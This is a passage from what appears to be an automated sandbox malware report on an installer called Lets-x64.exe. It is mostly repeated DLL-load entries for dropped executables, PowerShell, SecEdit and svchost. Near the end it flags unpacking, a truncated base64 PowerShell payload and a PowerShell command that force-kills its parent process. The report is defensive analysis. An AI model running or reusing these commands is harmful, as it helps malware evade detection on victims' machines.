                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: apphelp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: ntmarta.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: wldp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: profapi.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: urlmon.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: iertutil.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: srvcli.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: netutils.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: wininet.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: taskschd.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: sspicli.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: xmllite.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: mswsock.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: napinsp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: wshbth.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: nlaapi.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: dnsapi.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: winrnr.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: devenum.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: winmm.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: devobj.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: msasn1.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: msdmo.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: avicap32.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: msvfw32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: apphelp.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: ntmarta.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: iphlpapi.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: dhcpcsvc.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: profapi.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: twext.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: appresolver.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: bcp47langs.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: slc.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: userenv.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: sppc.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: policymanager.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: msvcp110_win.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: ntshrui.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: sspicli.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: windows.fileexplorer.common.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: iertutil.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: srvcli.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: cscapi.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: twinapi.appcore.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: textshaping.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: starttiledata.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: acppage.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: sfc.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: msi.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: aepic.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: cryptsp.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: sfc_os.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: edputil.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: urlmon.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: netutils.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: wintypes.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: mpr.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: ndfapi.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: wdi.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: duser.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: xmllite.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: atlthunk.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: textinputframework.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: coreuicomponents.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: coremessaging.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: coremessaging.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: taskschd.dll
                              Source: C:\ProgramData\Program\iusb3mon.exeSection loaded: xmllite.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: scecli.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: scecli.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: scecli.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: scecli.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\Lets-x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\inst.ini
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeDirectory created: C:\Program Files\product1\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeDirectory created: C:\Program Files\product1\letsvpn-latest.exeJump to behavior
                              Source: Lets-x64.exeStatic PE information: Image base 0x140000000 > 0x60000000
                              Source: Lets-x64.exeStatic file information: File size 21353869 > 1048576
                              Source: Lets-x64.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb source: _P18sPbB.exe, 00000011.00000003.2314228018.0000000003440000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp, iusb3mon.exe, 0000001C.00000003.2353080061.0000000000C30000.00000004.00001000.00020000.00000000.sdmp
                              Source: Binary string: \ConsoleApplication1\Release\ConsoleApplication1.pdb% source: _P18sPbB.exe, 00000011.00000003.2314228018.0000000003440000.00000004.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp, iusb3mon.exe, 0000001C.00000003.2353080061.0000000000C30000.00000004.00001000.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              Detected unpacking (creates a PE file in dynamic memory)
                              Source: C:\ProgramData\Program\iusb3mon.exeUnpacked PE file: 28.2.iusb3mon.exe.6240000.3.unpack
                              Found suspicious powershell code related to unpacking or dynamic code loading
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9AD
                              Suspicious powershell command line found
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
